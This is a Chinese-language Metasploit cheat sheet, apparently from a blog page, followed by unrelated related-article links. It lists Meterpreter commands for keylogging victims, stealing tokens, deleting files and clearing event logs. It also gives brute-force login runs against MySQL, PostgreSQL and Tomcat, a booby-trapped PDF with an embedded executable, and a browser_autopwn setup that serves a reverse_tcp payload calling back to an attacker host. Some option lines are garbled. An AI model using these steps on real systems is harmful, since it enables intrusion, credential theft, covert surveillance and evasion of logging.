msf、armitage
msfconsole的命令:
msfconsole
use module :这个命令允许你开始配置所选择的模块。
set optionname module :这个命令允许你为指定的模块配置不同的选项。
exploit :这个命令启动漏洞利用模块
run :这个命令启动非漏洞利用模块。
search module :这个命令允许你搜索独立模块。
help
exit
msfcli的命令:
msfcli
msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
msf -h
Meterpreter 执行实际的载荷分发和漏洞利用工作:
background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
download :这个命令允许你从受害者机器中下载文件。
upload :这个命令允许你向受害者机器上传文件。
execute :这个命令允许你在受害者机器上运行命令。
shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
session -i :这个命令允许你在会话之间切换。
开始记录目标系统中用户的击键顺序:
keyscan_start
转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
keyscan_dump
停止记录目标系统中用户的击键顺序。
keyscan_stop
删除目标系统中的文件。
del exploited.docx
清除目标系统中的事件日志。
clearav
展示运行进程的列表。
ps
杀掉受害者系统的指定进程,使用 kill [pid] 语法。
kill 6353
尝试偷取目标系统上的模拟令牌。
steal_token
msfconsole mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit
msfconsole postgresql
use auxiliary/scanner/mysql/postgres_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit
msfconsole tomcat
use auxiliary/scanner/http/tomcat_mgr_login
show options
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
set RHOSTS 192.168.10.111
set RPORT 8180
exploit
msfconsole
msfconsole pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit
实现 browser_autopwn:
浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
msfconsole autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.109
set URIPATH "filetypes"
exploit
Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
session –I 1
msf、armitage的更多相关文章
- 形形色色的软件生命周期模型(4)——MSF、实用型
摘要: 读大学时,我们曾经学习过不少软件生命周期模型,当时还不是很懂软件开发,你可能会觉得这些东西很新奇.在实际工作中,你会发现这些模型其实很难应用,与此同时你会接触到RUP.MSF等权威软件公司的生 ...
- Cobaltstrike、armitage联动
i 春秋作家:fengzi 原文来自:Cobaltstrike.armitage联动 在使用Cobaltstrike的时候发现他在大型或者比较复杂的内网环境中,作为内网拓展以及红队工具使用时拓展能力有 ...
- 第一次亲密接触MSF
第一次亲密接触MSF Metasploit Framework介绍 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇宙”之名的强 ...
- MSF基础攻击实践报告
MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...
- 现代软件工程 第七章 【MSF】练习与讨论
7.7 移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...
- 2018-2019 2 20165203 《网络对抗技术》Exp5 MSF基础
2018-2019 2 20165203 <网络对抗技术>Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: ...
- Metasploit 笔记
目录一.名词解释···································································· 3二.msf基础··············· ...
- 《Metasploit渗透测试魔鬼训练营》第一章读书笔记
第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...
- Cobalt Strike系列教程第一章:简介与安装
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能.同时,Cobalt St ...
随机推荐
- 02:Sysbench基准压测(oltp_update_index.lua、oltp_update_non_index.lua)my.cnf
目录 Sysbench 基准压测 my.cnf 一.Sysench测试前准备 1.1.压测环境 二.进行OLTP_update测试 2.1.安装压测工具sysbench 2.2.执行压测 三.执行结果 ...
- @RestController的方法中 路径参数带.(点号)配置
如下面这种//http://localhost:8080/api/v1/user/info/email/test@163.com @RequestMapping(value = "/info ...
- 排除maven jar冲突 maven tomcat插件启动报错 filter转换异常
最近在搞一个ssm+shiro的整合 用的maven tomcat插件 启动的时候报错,提示 maven org.springframework.web.filter.CharacterEncodin ...
- nginx代理socket tcp/udp
准备一台linux服务器.nginx官网:http://nginx.org/ .在网上搜到大致用的是 ngx_stream_core_module 这个模块,这里你也可以关注一下官方文档中的其他模块都 ...
- maven项目将web2.5改为web3.1
用maven构建的web项目默认的web.xml为2.3的版本,而我们需要更改为我们想要的版本(3.1). 在这里有两种方式更改web.xml的版本: 第一种: 将项目切换为navigator视图,然 ...
- scrapy框架的持久化存储
一 . 基于终端指令的持久化存储 保证爬虫文件的parse方法中有可迭代类型对象(通常为列表or字典)的返回,该返回值可以通过终端指令的形式写入指定格式的文件中进行持久化操作. 执行输出指定格式进行存 ...
- 自动补齐flexselect+级联下拉框案例
在开发web应用时,经常遇到类似省市区级联下拉框操作,即选中省份自动级联加载该省份所有的市,选中市自动级联加载该市所有的区:假设省市区的数据量很大,此时用户想选中某市,因而要从上往下查找,可能半天都找 ...
- 面试------Android 版本之前的差异(常见,欢迎补充)。
不管你技术如何,只要背点这个,能忽悠倒一片.. 1.WebView JS漏洞 ,Android4.2之前 ,解决办法,不用addJavascriptInterface,webchrome的onJsPr ...
- Lucene介绍及简单入门案例(集成ik分词器)
介绍 Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,提供了完整的查询引擎和 ...
- word2012写论文之参考文献和图片
每次写论文都感到word的“博大精深”啊,一个版本一个样,一些原来版本还有的功能,后来的版本就没有了,一些原来版本叫这个名字的功能,下一个版本就换了个名字,你也太考验你用户的智商和耐心了吧!即使同一份 ...